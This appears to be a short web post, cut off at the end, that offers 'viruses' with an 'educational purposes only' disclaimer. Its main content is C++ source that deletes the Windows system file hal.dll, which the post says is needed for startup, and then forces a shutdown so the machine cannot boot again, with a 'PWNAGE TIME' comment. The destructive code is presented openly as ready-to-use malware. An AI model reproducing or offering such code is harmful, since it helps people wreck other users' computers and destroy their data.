![]()
Note: These viruses are only for educational purposes. 1. This is a virus which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.#include <cstdlib>#include <iostream>using namespace std;int main(int argc, char *argv[]){ std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME system("shutdown -s -r"); system("PAUSE"); return EXIT_SUCCESS;}A more...